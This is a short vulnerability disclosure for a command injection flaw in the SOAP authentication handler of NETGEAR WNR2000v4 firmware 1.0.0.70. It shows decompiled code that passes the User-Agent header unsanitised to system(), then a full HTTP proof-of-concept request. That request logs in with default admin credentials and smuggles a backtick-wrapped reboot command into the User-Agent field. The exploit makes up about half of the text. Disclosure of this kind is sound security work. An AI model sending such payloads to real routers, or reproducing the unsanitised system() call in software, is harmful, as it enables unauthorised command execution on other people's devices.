Command injection vulnerability exists in NETGEAR WNR2000v4, firmware version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.
In the SOAP authentication function soap_auth, the User-Agent of the successful authentication packet will be written to the /tmp/soap_user_agent file, which can lead to command injection.Injecton could be triggered by handle_request -> ExecuteSoapAction -> soap_auth.
soap_auth(){
...
if ( soap_user_agent )
{
sprintf(v18, "echo %s >>/tmp/soap_user_agent", soap_user_agent);
system(v18);
return 1;
}
...
}GET http://192.168.1.1/currentsetting.htm HTTP/1.1
Accept: text/xml
Accept: multipart/*
Accept: application/soap
User-Agent: ";`reboot`;"
Content-Length: 691
Content-Type: text/xml; charset=utf-8
SOAPAction: "urn:NETGEAR-ROUTER:service:ParentalControl:1#Authenticate"
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:M1="urn:NETGEAR-ROUTER:service:ParentalControl:1"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soap:Header>
<SessionID>16DF8F8B8CBB9B1A1016</SessionID>
</soap:Header>
<soap:Body>
<M1:Authenticate>
<NewUsername>admin</NewUsername>
<NewPassword>password</NewPassword>
</M1:Authenticate>
</soap:Body>
</soap:Envelope>